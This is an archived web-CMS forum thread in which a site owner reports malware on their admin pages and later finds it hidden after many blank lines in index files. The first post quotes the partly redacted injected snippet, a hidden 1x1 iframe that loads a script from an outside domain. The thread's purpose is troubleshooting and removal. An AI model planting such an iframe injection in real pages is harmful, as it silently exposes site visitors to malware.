Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

Admin pages compromised (hacked?)

March 01, 2011 1:45pm

Subscribe [1]

#1 / Mar 01, 2011 1:45pm
cammonline
1 posts
Version: EE 1.7
I have a site where there is evidence of malware, but only in the bottom of the admin pages. The public side seems ok.

If I view source on the login or orther admin pages, I find 2 incidences of <!—counter—> comments. The second gets the page flagged for malware:
```
[removed]status=location;[removed]('<iframe src="http://advancedwebanalytic.com/stats/fnktcnfza3.php" width="1" height="1" frameborder="0"></iframe>');[removed]
```
I’m not even sure where to look for the source of this code. In the database? I’ve looked through the templates, and find nothing. That’s not surprising to me as the offending code doesn’t appear on the public pages.

Help.
#2 / Mar 01, 2011 2:08pm

cammonline
1 posts

Never mind—I found the offending code(s) at the end of many, may blank lines in both index.html and index.php…

I am still wondering how someone could break in and put the code there—but, for today, it is gone.
#3 / Mar 01, 2011 3:27pm

Ingmar
29245 posts

Are you sure the code wasn’t put in there by you or anybody else working on the site? I’ve seen malware injections, but this looks almost legitimate to me.